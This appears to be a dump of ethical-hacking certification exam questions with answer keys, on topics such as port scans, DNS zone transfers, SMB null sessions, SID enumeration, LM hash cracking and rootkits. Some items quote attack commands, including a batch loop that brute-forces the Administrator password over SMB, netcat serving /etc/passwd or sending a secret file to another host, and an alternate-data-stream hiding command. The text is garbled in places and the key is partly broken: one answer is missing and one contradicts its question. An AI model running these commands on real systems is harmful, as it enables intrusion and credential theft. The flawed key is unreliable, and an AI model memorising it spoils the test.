NMAP scan report for 172.16.40.65 Host is up (1.00s latency).Not shown: 993 closed ports PORT
STATE SERVICE 21/tcp open ftp
23/tcp open telnet
80/tcp open http 139/tcp open netbios-ssn 515/tcp open631/tcp
open ipp 9100/tcp open
MAC Address: 00:00:48:0D:EE:89
A. The host is likely a Windows machine.

B. The host is likely a Linux machine.
C. The host is likely a router.
D. The host is likely a printer.
Correct Answer: D
Section: (none)
Explanation
QUESTION 433
What type of OS fingerprinting technique sends specially crafted packets to the remote OS and
analyzes thereceived response?
A. Passive
B. Reflective
C. Active
D. Distributive
Correct Answer: C
Section: (none)
Explanation
QUESTION 434
Which of the following lists are valid data-gathering activities associated with a risk assessment?
A. Threat identification, vulnerability identification, control analysis

B. Threat identification, response identification, mitigation identification
C. Attack profile, defense profile, loss profile
D. System profile, vulnerability identification, security determination
Correct Answer: A
Section: (none)
Explanation
QUESTION 435
Which system consists of a publicly available set of databases that contain domain name registration
contact information?
A. WHOIS
B. IANA
C. CAPTCHA
D. IETF
Correct Answer: A
Section: (none)
Explanation
QUESTION 436
A penetration tester was hired to perform a penetration test for a bank. The tester began searching
for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news
articles online about the bank, watching what times the bank employees come into work and leave
from work, searchingthe bank's job postings (paying special attention to IT related jobs), and visiting
the local dumpster for thebank's corporate office. What phase of the penetration test is the tester
currently in?
A. Information reporting
B. Vulnerability assessment
C. Active information gathering
D. Passive information gathering
Correct Answer: D
Section: (none)
Explanation
QUESTION 437
The following is part of a log file taken from the machine on the network with the IP address of
192.168.1.106:
Time:Mar 13 17:30:15 Port:20 Source:192.168.1.103

Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:17 Port:21
Source:192.168.1.103
Source:192.168.1.103
Source:192.168.1.103
Source:192.168.1.103
Source:192.168.1.103
Destination:192.168.1.106 Protocol:TCP Time:Mar 1317:30:30 Port:443
Source:192.168.1.103
Destination:192.168.1.106 Protocol:TCPWhat type of activity has been logged?
A. Port scan targeting 192.168.1.103

B. Teardrop attack targeting192.168.1.106
C. Denial of service attack targeting192.168.1.103
D. Port scan targeting 192.168.1.106
Correct Answer: D
Section: (none)
Explanation
QUESTION 438
SNMP is a protocol used to query hosts, servers, and devices about performance or health status
data.This protocol has long been used by hackers to gather great amount of information about
remote hosts.
Which of the following features makes this possible? (Choose two)
A. It used TCP as the underlyingprotocol.

B. It uses community string that is transmitted in clear text.
C. It is susceptible to sniffing.
D. It is used by all network devices on the market.
Correct Answer: BC
Section: (none)
Explanation
QUESTION 439
John is a keen administrator, and has followed all of the best practices as he could find on securing
hisWindows Server. He has renamed the Administrator account to a new name that he is sure
cannot be easily guessed. However, there are people who already attempt to compromise his newly
renamed administrator account.
How is it possible for a remote attacker to decipher the name of the administrator account if it has
beenrenamed?
A. The attacker used the user2sid program.

B. The attacker used the sid2user program.
C. The attacker used nmap with the Vswitch.
D. The attacker guessed the new name.
Correct Answer: B
Section: (none)
Explanation
QUESTION 440
Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashes and
stores them for offline cracking. Once cracked, these passwords can provide easy access to
whatever networkresources the user account has access to.
But Jess is not picking up hashed from the network.Why?
A. The network protocol is configured to use SMB Signing.

B. The physical network wire is on fibre optic cable.
C. The network protocol is configured to useIPSEC.
D. L0phtCrack SMB filtering only works through Switches and not Hubs.
Correct Answer: A
Section: (none)
Explanation
QUESTION 441
Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites.
Bob is willing to share his knowledge with those who are willing to learn, and many have expressed
their interest inlearning from him. However, this knowledge has a risk associated with it, as it can be
used for malevolent attacks as well.
In this context, what would be the most affective method to bridge the knowledge gap between the
"black"hats or crackers and the "white" hats or computer security professionals? (Choose the test
answer)
A. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards.
B. Hire more computer security monitoring personnel to monitor computer systems and networks.
C. Make obtaining either a computer security certification or accreditation easier to achieve so more
individuals feel that they are a part of something larger than life.
D. Train more National Guard and reservist in the art of computer security to help out in times ofemergency
or crises.
Correct Answer: A
Section: (none)
Explanation
QUESTION 442
Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool
"SIDExtractor". Hereis the output of the SIDs:
s-1-5-21-1125394485-807628933-54978560-100Johns
s-1-5-21-1125394485-807628933-54978560-652Rebecca s-1-5-21-1125394485-807628933-
54978560-412Sheela s-1-5-21-1125394485-807628933-54978560-999Shawn
s-1-5-21-1125394485-807628933-54978560-777Somia s-1-5-21-1125394485-807628933-54978560-
500chang s-
1-5-21-1125394485-807628933-54978560-555Micah
From the above list identify the user account with System Administrator privileges.
A. John
B. Rebecca
C. Sheela
D. Shawn
E. Somia
F. Chang
G. Micah
Correct Answer: F
Section: (none)
Explanation
QUESTION 443
Which address translation scheme would allow a single public IP address to always correspond to a
singlemachine on an internal network, allowing "server publishing"?
A. Overloading Port AddressTranslation

B. Dynamic Port Address Translation
C. Dynamic Network Address Translation
D. Static Network Address Translation
Correct Answer: D
Section: (none)
Explanation
Explanation: Mapping an unregistered IP address to a registered IP address on a one-to-one basis.
Particularly useful when a device needs to be accessible from outside the network.
QUESTION 444
What is the following command used for?net use \targetipc$ "" /u:""
A. Grabbing the etc/passwd file

B. Grabbing the SAM
C. Connecting to a Linux computer throughSamba.
D. This command is used to connect as a null session
E. Enumeration of Cisco routers
Correct Answer: D
Section: (none)
Explanation
QUESTION 445
What is the proper response for a NULL scan if the port is closed?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
Correct Answer: E
Section: (none)
Explanation
QUESTION 446
One of your team members has asked you to analyze the following SOA record. What is the TTL?
Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600
3600 604800 2400.
A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800
Correct Answer: D
Section: (none)
Explanation
QUESTION 447
One of your team members has asked you to analyze the following SOA record. What is the version?
Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600
3600 604800 2400.
A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800
Correct Answer: A
Section: (none)
Explanation
QUESTION 448
MX record priority increases as the number increases.(True/False).
A. True
B. False
Correct Answer: B
Section: (none)
Explanation
QUESTION 449
Which of the following tools can be used to perform a zone transfer?
A. NSLookup
B. Finger
C. Dig
D. Sam Spade
E. Host
F. Netcat
G. Neotrace
Correct Answer: ACDE

Section: (none)
Explanation
QUESTION 450
Under what conditions does a secondary name server request a zone transfer from a primary name
server?
A. When a primary SOA is higher that a secondarySOA

B. When a secondary SOA is higher that a primarySOA
C. When a primary name server has had its service restarted
D. When a secondaryname server has had its service restarted
E. When the TTL falls to zero
Correct Answer: A
Section: (none)
Explanation
QUESTION 451
What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming through the
firewallif your network is comprised of Windows NT, 2000, and XP?(Choose all that apply.
A. 110
B. 135
C. 139
D. 161
E. 445
F. 1024
Correct Answer: BCE

Section: (none)
Explanation
QUESTION 452
What is a NULL scan?
A. A scan in which all flags are turnedoff

B. A scan in which certain flags are off
C. A scan in which all flags are on
D. A scan in which the packet size is set to zero
E. A scan with a illegal packet size
Correct Answer: A
Section: (none)
Explanation
QUESTION 453
What is the proper response for a NULL scan if the port is open?
A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response
Correct Answer: F
Section: (none)
Explanation
QUESTION 454
Which of the following statements about a zone transfer correct?(Choose three.)
A. A zone transfer is accomplished with theDNS

B. A zone transfer is accomplished with the nslookup service
C. A zone transfer passes all zone information that a DNS server maintains
D. A zone transfer passes all zone information that a nslookup server maintains
E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
F. Zone transfers cannot occur on theInternet
Correct Answer: ACE

Section: (none)
Explanation
QUESTION 455
You have the SOA presented below in your Zone. Your secondary servers have not been able to
contact your primary server to synchronize information. How long will the secondary servers attempt
to contact theprimary server before it considers that zone is dead and stops responding to queries?
collegae.edu.SOA,cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)
A. One day
B. One hour
C. One week
D. One month
Correct Answer: C
Section: (none)
Explanation
QUESTION 456
Sara is using the nslookup command to craft queries to list all DNS information (such as Name
Servers, host names, MX records, CNAME records, glue records (delegation for child Domains),
zone serial number,TimeToLive (TTL) records, etc) for a Domain. What do you think Sara is trying to
accomplish? Select the best answer.
A. A zone harvesting
B. A zone transfer
C. A zone update
D. A zone estimate
Correct Answer: B
Section: (none)
Explanation
QUESTION 457
A zone file consists of which of the following Resource Records (RRs)?
A. DNS, NS, AXFR, and MX records

B. DNS, NS, PTR, and MX records
C. SOA, NS, AXFR, and MX records
D. SOA, NS, A, and MX records
Correct Answer: D
Section: (none)
Explanation
QUESTION 458
Let's imagine three companies (A, B and C), all competing in a challenging global environment.
Company Aand B are working together in developing a product that will generate a major
competitive advantage for them. Company A has a secure DNS server while company B has a DNS
server vulnerable to spoofing.
With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-
mails fromcompany B. How do you prevent DNS spoofing? (Select the Best Answer.)
A. Install DNS logger and track vulnerable packets

B. Disable DNS timeouts
C. Install DNS Anti-spoofing
D. Disable DNS Zone Transfer
Correct Answer: C
Section: (none)
Explanation
QUESTION 459
Which DNS resource record can indicate how long any "DNS poisoning" could last?
A. MX
B. SOA
C. NS
D. TIMEOUT
Correct Answer: B
Section: (none)
Explanation
QUESTION 460
Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site
was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the
Web site. Onenight, Joseph received an urgent phone call from his friend, Smith. According to
Smith, the main Mason Insurance web site had been vandalized! All of its normal content was
removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!''
From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed
to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes
were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web
site appeared defaced when his friend visited using his DSL connection. So, while Smith and his
friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make
sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He
disconnected his laptop from thecorporate internal network and used his modem to dial up the same
ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser
to reveal the following web page:
H@cker Mess@ge:
Y0u @re De@d! Fre@ks!
After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal
network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against
the entire Website, and determined that every system file and all the Web content on the server were
intact.
How did the attacker accomplish this hack?
A. ARP spoofing
B. SQL injection
C. DNS poisoning
D. Routing table injection
Correct Answer: C
Section: (none)
Explanation
QUESTION 461
Which of the following tools are used for enumeration? (Choose three.)
A. SolarWinds
B. USER2SID
C. Cheops
D. SID2USER
E. DumpSec
Correct Answer: BDE

Section: (none)
Explanation
QUESTION 462
What did the following commands determine?C : user2sid \earth guest
S-1-5-21-343818398-789336058-1343024091-501 C:sid2user 5 21 343818398 789336058
1343024091 500
Name is Joe Domain is EARTH
A. That the Joe account has a SID of 500

B. These commands demonstrate that the guest account has NOT been disabled
C. These commands demonstrate that the guest account has been disabled
D. That the true administrator is Joe
E. Issued alone, these commands prove nothing
Correct Answer: D
Section: (none)
Explanation
QUESTION 463
Which definition among those given below best describes a covert channel?
A. A server program using a port that is not well known.

B. Making use of a protocol in a way it is not intended to be used.
C. It is the multiplexing taking place on a communication link.
D. It is one of the weak channels used by WEP which makes it insecure.
Correct Answer: B
Section: (none)
Explanation
QUESTION 464
Susan has attached to her company's network. She has managed to synchronize her boss's
sessions with that of the file server. She then intercepted his traffic destined for the server, changed
it the way she wantedto and then placed it on the server in his home directory. What kind of attack is
Susan carrying on?
A. A sniffing attack
B. A spoofing attack
C. A man in the middleattack
D. A denial of service attack
Correct Answer: C
Section: (none)
Explanation
QUESTION 465
Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use
these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept
communications between the two entities and establish credentials with both sides of the
connections.The two remote ends of the communication never notice that Eric is relaying the
information between the two.
What would you call this attack?
A. Interceptor
B. Man-in-the-middle
C. ARP Proxy
D. Poisoning Attack
Correct Answer: B
Section: (none)
Explanation
QUESTION 466
Eve is spending her day scanning the library computers. She notices that Alice is using a computer
whose port 445 is active and listening. Eve uses the ENUM tool to enumerate
Alice machine. From the command prompt, she types the following command.
For /f "tokens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:"Administrator" %%aWhat is
Eve trying to do?
A. Eve is trying to connect as an user with Administrator privileges

B. Eve is trying to enumerate all users with Administrative privileges
C. Eve is trying to carry out a password crack for user Administrator
D. Eve is trying to escalate privilege of the null user to that of Administrator
Correct Answer: C
Section: (none)
Explanation
QUESTION 467
Which of the following represents the initial two commands that an IRC client sends to join an IRC
network?
A. USER, NICK
B. LOGIN, NICK
C. USER, PASS
D. LOGIN, USER
Correct Answer: A
Section: (none)
Explanation
QUESTION 468
What does FIN in TCP flag define?
A. Used to close a TCP connection

B. Used to abort a TCP connection abruptly
C. Used to indicate the beginning of a TCP connection
D. Used to acknowledge receipt of a previous packet or transmission
Correct Answer: A
Section: (none)
Explanation
QUESTION 469
What port number is used by LDAP protocol?
A. 110
B. 389
C. 445
D. 464
Correct Answer: B
Section: (none)
Explanation
QUESTION 470
Null sessions are un-authenticated connections (not using a username or password.) to an NT or
2000system. Which TCP and UDP ports must you filter to check null sessions on your network?
A. 137 and 139

B. 137 and 443
C. 139 and 443
D. 139 and 445
Correct Answer: D
Section: (none)
Explanation
QUESTION 471
What sequence of packets is sent during the initial TCP three-way handshake?
A. SYN, URG, ACK

B. FIN, FIN-ACK, ACK
C. SYN, ACK, SYN-ACK
D. SYN, SYN-ACK, ACK
Correct Answer: D
Section: (none)
Explanation
QUESTION 472
Exhibit:
What type of attack is shown in the above diagram?
A. SSL Spoofing Attack

B. Identity Stealing Attack
C. Session Hijacking Attack
D. Man-in-the-Middle (MiTM) Attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 473
Exhibit:
Study the following log extract and identify the attack.
A. Hexcode Attack
B. Cross Site Scripting
C. Multiple Domain Traversal Attack
D. Unicode Directory Traversal Attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 474
Exhibit:l
Based on the following extract from the log of a compromised machine, what is the hacker really
trying tosteal?
A. har.txt
B. SAM file
C. wwwroot
D. Repair file
Correct Answer: B
Section: (none)
Explanation
QUESTION 475
Exhibit:
The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You
notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the
attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an
analyst what would you conclude about the attack?
A. The buffer overflow attack has been neutralized by the IDS

B. The attacker is creating a directory on the compromised machine
C. The attacker is attempting a buffer overflow attack and has succeeded
D. The attacker is attempting an exploit that launches a command-line shell
Correct Answer: D
Section: (none)
Explanation
QUESTION 476
As a securing consultant, what are some of the things you would recommend to a company to ensure DNS
security?Select the best answers.
A. Use the same machines for DNS and otherapplications

B. Harden DNS servers
C. Use split-horizon operation for DNSservers
D. Restrict Zone transfers
E. Have subnet diversitybetween DNS servers
Correct Answer: BCDE

Section: (none)
Explanation
QUESTION 477
What tool can crack Windows SMB passwords simply by listening to network traffic? Select the best answer.
A. This is not possible

B. Netbus
C. NTFSDOS
D. L0phtcrack
Correct Answer: D
Section: (none)
Explanation
QUESTION 478
A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network.
What are some things he can do toprevent it?
Select the best answers.
A. Use port security on hisswitches.

B. Use a tool like ARPwatch to monitor for strange ARP activity.
C. Use a firewall between all LANsegments.
D. If you have a small network, use static ARP entries.
E. Use only static IP addresses on allPC's.
Correct Answer: ABD

Section: (none)
Explanation
QUESTION 479
Peter, a Network Administrator, has come to you looking for advice on a tool that would help him perform
SNMP enquires over the network. Which ofthese tools would do the SNMP enumeration he is looking for?
A. SNMPUtil
B. SNScan
C. SNMPScan
D. Solarwinds IP Network Browser
E. NMap
Correct Answer: ABD

Section: (none)
Explanation
QUESTION 480
SNMP is a protocol used to query hosts, servers and devices about performance or health status data. Hackers
have used this protocol for a longtime to gather great amount of information about remote hosts. Which of the
following features makes this possible?
A. It is susceptible to sniffing
B. It uses TCP as the underlyingprotocol
C. It is used by ALL devices on themarket
D. It uses a community string sent as clear text
Correct Answer: AD
Section: (none)
Explanation
QUESTION 481
Jonathan being a keen administrator has followed all of the best practices he could find on securing his
Windows Server. He renamed the Administrator account to a new name that can't be easily guessed but there
remain people who attempt to compromise his newly renamedadministrator account. How can a remote
attacker decipher the name of the administrator account if it has been renamed?
A. The attacker guessed the newname

B. The attacker used the user2sid program
C. The attacker used to sid2user program
D. The attacker used NMAP with the Voption
Correct Answer: C
Section: (none)
Explanation
QUESTION 482
SNMP is a connectionless protocol that uses UDP instead of TCP packets? (True or False)
A. True
B. False
Correct Answer: A
Section: (none)
Explanation
QUESTION 483
Maurine is working as a security consultant for Hinklemeir Associate. She has asked the Systems Administrator
to create a group policy that wouldnot allow null sessions on the network. The Systems Administrator is fresh
out of college and has never heard of null sessions and does not know what they are used for. Maurine is trying
to explain to the Systems Administrator that hackers will try to create a null session when footprinting the
network.
Why would an attacker try to create a null session with a computer on a network?
A. Enumerate users shares

B. Install a backdoor for later attacks
C. Escalate his/her privileges on the target server
D. To create a user with administrative privileges for later use
Correct Answer: A
Section: (none)
Explanation
QUESTION 484
If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token
performs off-line checking for thecorrect PIN, what type of attack is possible?
A. Birthday
B. Brute force
C. Man-in-the-middle
D. Smurf
Correct Answer: B
Section: (none)
Explanation
QUESTION 485
Bob is doing a password assessment for one of his clients. Bob suspects that security policies are not in place.
He also suspects that weakpasswords are probably the norm throughout the company he is
evaluating. Bob is familiar with password weaknesses and key loggers.
Which of the following options best represents the means that Bob can adopt to retrieve passwords from his
clients hosts and servers.
A. Hardware, Software, and Sniffing.

B. Hardware and SoftwareKeyloggers.
C. Passwords are always best obtained using Hardware key loggers.
D. Software only, they are the most effective.
Correct Answer: A
Section: (none)
Explanation
QUESTION 486
Study the snort rule given below:
From the options below, choose the exploit against which this rule applies.
A. WebDav
B. SQL Slammer
C. MS Blaster
D. MyDoom
Correct Answer: C
Section: (none)
Explanation
QUESTION 487
Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or
stored? (Choose the best answer)
A. symmetric algorithms
B. asymmetric algorithms
C. hashing algorithms
D. integrity algorithms
Correct Answer: C
Section: (none)
Explanation
QUESTION 488
A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges
which carry user logons. The user isplugged into a hub with 23 other systems. However, he is unable to capture
any logons though he knows that other users are logging in.
What do you think is the most likely reason behind this?
A. There is a NIDS present on that segment.

B. Kerberos is preventingit.
C. Windows logons cannot be sniffed.
D. L0phtcrack only sniffs logons to webservers.
Correct Answer: B
Section: (none)
Explanation
QUESTION 489
You are attempting to crack LM Manager hashed from Windows 2000 SAM file. You will be using LM Brute
force hacking tool for decryption.What encryption
algorithm will you be decrypting?
A. MD4
B. DES
C. SHA
D. SSL
Correct Answer: B
Section: (none)
Explanation
QUESTION 490
In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of
dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user
accounts located by the application. The larger the word and wordfragment selection, the more effective the
dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible
letter and number combination in its automated exploration.
If you would use both brute force and dictionary methods combined together to have variation of words, what
would you call such an attack?
A. Full Blown
B. Thorough
C. Hybrid
D. BruteDics
Correct Answer: C
Section: (none)
Explanation
QUESTION 491
What is the algorithm used by LM for Windows2000 SAM ?
A. MD4
B. DES
C. SHA
D. SSL
Correct Answer: B
Section: (none)
Explanation
QUESTION 492
E-mail scams and mail fraud are regulated by which of the following?
A. 18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers
B. 18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices
C. 18 U.S.C. par. 1362 Communication Lines, Stations, or Systems
D. 18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral
Communication
Correct Answer: A
Section: (none)
Explanation
QUESTION 493
Which of the following LM hashes represent a password of less than 8 characters? (Select 2)
A. BA810DBA98995F1817306D272A9441BB
B. 44EFCE164AB921CQAAD3B435B51404EE C.0182BD0BD4444BF836077A718CCDF409 D.
CEC52EB9C8E3455DC2265B23734E0DAC E.
B757BF5C0D87772FAAD3B435B51404EE F. E52CAC67419A9A224A3B108F3FA6CB6D
Correct Answer: B
Section: (none)
Explanation
QUESTION 494
Which of the following is the primary objective of a rootkit?
A. It opens a port to provide an unauthorized service

B. It creates a buffer overflow
C. It replaces legitimate programs
D. It provides an undocumented opening in a program
Correct Answer: C
Section: (none)
Explanation
QUESTION 495
This kind of password cracking method uses word lists in combination with numbers and special characters:
A. Hybrid
B. Linear
C. Symmetric
D. Brute Force
Correct Answer: A
Section: (none)
Explanation
QUESTION 496
Exhibit
You receive an e-mail with the message displayed in the exhibit.
From this e-mail you suspect that this message was sent by some hacker since you have using their e-mail
services for the last 2 years and theynever sent out an e-mail as this. You also observe the URL in the
message and confirm your suspicion about 340590649. You immediately enterthe following at the Windows
2000 command prompt.
ping 340590649
You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL? A.
192.34.5.9B. 10.0.3.4
A. 203.2.4.5
B. 199.23.43.4
Correct Answer:
Section: (none)
Explanation
QUESTION 497
is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.
A. Trojan
B. RootKit
C. DoS tool
D. Scanner
E. Backdoor
Correct Answer: B
Section: (none)
Explanation
QUESTION 498
What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?
A. Copythe system files from a known good system

B. Perform a trap and trace
C. Delete the files and try to determine the source
D. Reload from a previous backup
E. Reload from known good media
Correct Answer: E
Section: (none)
Explanation
QUESTION 499
What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?
A. All are hacking tools developed by the legion of doom

B. All are tools that can be used not only by hackers, but also security personnel
C. All are DDOS tools
D. All are tools that are only effective against Windows
E. All are tools that are only effective against Linux
Correct Answer: C
Section: (none)
Explanation
QUESTION 500
How can you determine if an LM hash you extracted contains a password that is less than 8 characters long?
A. There is no way to tell because a hash cannot be reversed

B. The right most portion of the hash is always the same
C. The hash always starts withAB923D
D. The left most portion of the hash is always thesame
E. A portion of the hash will be all 0's
Correct Answer: B
Section: (none)
Explanation
QUESTION 501
When discussing passwords, what is considered a brute force attack?
A. You attempt every single possibility until you exhaust all possible combinations or discover the password
B. You threaten to use the rubber hose on someone unless they reveal their password
C. You load a dictionary of words into your cracking program
D. You create hashes of a large number of words and compare it with the encrypted passwords
E. You wait until the password expires
Correct Answer: A
Section: (none)
Explanation
QUESTION 502
Password cracking programs reverse the hashing process to recover passwords.(True/False.
A. True
B. False
Correct Answer: B
Section: (none)
Explanation
QUESTION 503
While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You
would like to block this, though youdo not see any evidence of an attack or other wrong doing.
However, you are concerned about affecting the normal functionality of the email server. From the following
options choose how best you canachieve this objective?
A. Block port 25 at the firewall.

B. Shut off the SMTP service on the server.
C. Force all connections to use a username and password.
D. Switch from Windows Exchange to UNIXSendmail.
E. None of the above.
Correct Answer: E
Section: (none)
Explanation
QUESTION 504
Windows LAN Manager (LM) hashes are known to be weak. Which of the following are known weaknesses of
LM? (Choose three)
A. Converts passwords to uppercase.

B. Hashes are sent in clear text over thenetwork.
C. Makes use of only32 bit encryption.
D. Effective length is 7 characters.
Correct Answer: ABD

Section: (none)
Explanation
QUESTION 505
You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering,
you come to know that they are enforcing strong passwords. You understand that all users are required to use
passwords that are at least 8 characters in length. All passwords mustalso use 3 of the 4 following categories:
lower case letters, capital letters, numbers and special characters.
With your existing knowledge of users, likely user account names and the possibility that they will choose the
easiest passwords possible, whatwould be the fastest type of password cracking attack you can run against
these hash values and still get results?
A. Online Attack
B. Dictionary Attack
C. Brute Force Attack
D. Hybrid Attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 506
An attacker runs netcat tool to transfer a secret file between two hosts. Machine A: netcat -l -p 1234 <
secretfileMachine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt the
information before transmitting ontothe wire?
A. Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat <machine A IP> 1234
B. Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat <machine A IP> 1234
C. Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat <machine A IP> 1234 - pw password
D. Use cryptcat instead of netcat
Correct Answer: D
Section: (none)
Explanation
QUESTION 507
You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct assesments to protect
the company's network. During one of your periodic checks to see how well policy is being observed by the
employees, you discover an employee has attached a modem to his telephone line and workstation. He has
used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurredas
a direct result of this activity. The employee explains that he used the modem because he had to download
software for a department project.
How would you resolve this situation?
A. Reconfigure the firewall

B. Conduct a needs analysis
C. Install a network-based IDS
D. Enforce the corporate securitypolicy
Correct Answer: D
Section: (none)
Explanation
QUESTION 508
What is GINA?
A. Gateway InterfaceNetwork Application

B. GUI Installed Network Application CLASS
C. Global Internet National Authority (G-USA)
D. Graphical Identification and Authentication DLL
Correct Answer: D
Section: (none)
Explanation
QUESTION 509
Fingerprinting an Operating System helps a cracker because:
A. It defines exactly what software you have installed

B. It opens a security-delayed window based on the port being scanned
C. It doesn't depend on the patches that have been applied to fix existing security holes
D. It informs the cracker of which vulnerabilities he may be able to exploit on your system
Correct Answer: D
Section: (none)
Explanation
QUESTION 510
In the context of Windows Security, what is a 'null' user?
A. A user that has no skills

B. An account that has been suspended by the admin
C. A pseudo account that has no username and password
D. A pseudo account that was created for security administration purpose
Correct Answer: C
Section: (none)
Explanation
QUESTION 511
What does the following command in netcat do? nc -l -u -p 55555 < /etc/passwd
A. logs the incoming connections to /etc/passwdfile

B. loads the /etc/passwd file to the UDP port 55555
C. grabs the /etc/passwd file when connected to UDP port 55555
D. deletes the /etc/passwd file when connected to the UDP port 55555
Correct Answer: C
Section: (none)
Explanation
QUESTION 512
What hacking attack is challenge/response authentication used to prevent?
A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks
Correct Answer: A
Section: (none)
Explanation
QUESTION 513
What file system vulnerability does the following command take advantage of? type c:\anyfile.exe >c:\winnt
\system32\calc.exe:anyfile.exe
A. HFS
B. ADS
C. NTFS
D. Backdoor access
Correct Answer: B
Section: (none)
Explanation
QUESTION 514
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that
the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after
a legitimate authentication and gain unauthorized access to data. Which ofthe following is NOT a means that
can be used to minimize or protect against such an attack?
A. Timestamps
B. SMB Signing
C. File permissions
D. Sequence numbers monitoring
Correct Answer: ABD

Section: (none)
Explanation
QUESTION 515
Which of the following steganography utilities exploits the nature of white space and allows the user to conceal
information in these whitespaces?
A. Snow
B. Gif-It-Up
C. NiceText
D. Image Hide
Correct Answer: A
Section: (none)
Explanation
QUESTION 516
is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting
their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer
A. Steganography
B. Merge Streams
C. NetBIOS vulnerability
D. Alternate Data Streams
Correct Answer: D
Section: (none)
Explanation
QUESTION 517
LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because
an attacker eavesdropping on networktraffic will attack the weaker protocol. A successful attack can
compromise the user's password. How do you disable LM authentication in Windows XP?
A. Stop the LM service in WindowsXP
B. Disable LSASS service in Windows XP
C. Disable LM authentication in theregistry
D. Download and install LMSHUT.EXE tool from Microsoft website
Correct Answer: C
Section: (none)
Explanation
QUESTION 518
How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over
long periods of time with the purpose of defeating simple pattern matching in IDS systems without session
reconstruction? A characteristic of this attack would be a continuousstream of small packets.
A. Session Splicing
B. Session Stealing
C. Session Hijacking
D. Session Fragmentation
Correct Answer: A
Section: (none)
Explanation
QUESTION 519
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?
A. Covert keylogger
B. Stealth keylogger
C. Software keylogger
D. Hardware keylogger
Correct Answer: D
Section: (none)
Explanation
QUESTION 520
is the process of converting something from one representation to the simplest form. It deals with the way in
which systems convert data from one form to another.
A. Canonicalization
B. Character Mapping
C. Character Encoding
D. UCS transformation formats
Correct Answer: A
Section: (none)
Explanation
QUESTION 521
You are a Administrator of Windows server. You want to find the port number for POP3. What file would you
find the information in and where?Select the
best answer.
A. %windir%\\etc\\services
B. system32\\drivers\\etc\\services
C. %windir%\\system32\\drivers\\etc\\servicesetc/services
D. %windir%/system32/drivers/etc/services
Correct Answer: C
Section: (none)
Explanation
QUESTION 522
One of your junior administrator is concerned with Windows LM hashes and password cracking. In your
discussion with them, which of the followingare true statements that you would point out?
A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't
show if the password is upper or lowercase.
B. BY using NTLMV1, you have implemented an effective countermeasure to password cracking.
C. SYSKEY is an effectivecountermeasure.
D. If a Windows LM password is 7 characters or less, the hash will be passed with the following characters, in
HEX- 00112233445566778899.
E. Enforcing Windows complex passwords is an effectivecountermeasure.
Correct Answer: ACE

Section: (none)
Explanation
QUESTION 523
In the following example, which of these is the "exploit"?
Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the
Windows 2003 Server operating system, bysending malformed packets to it. They detailed how this malicious
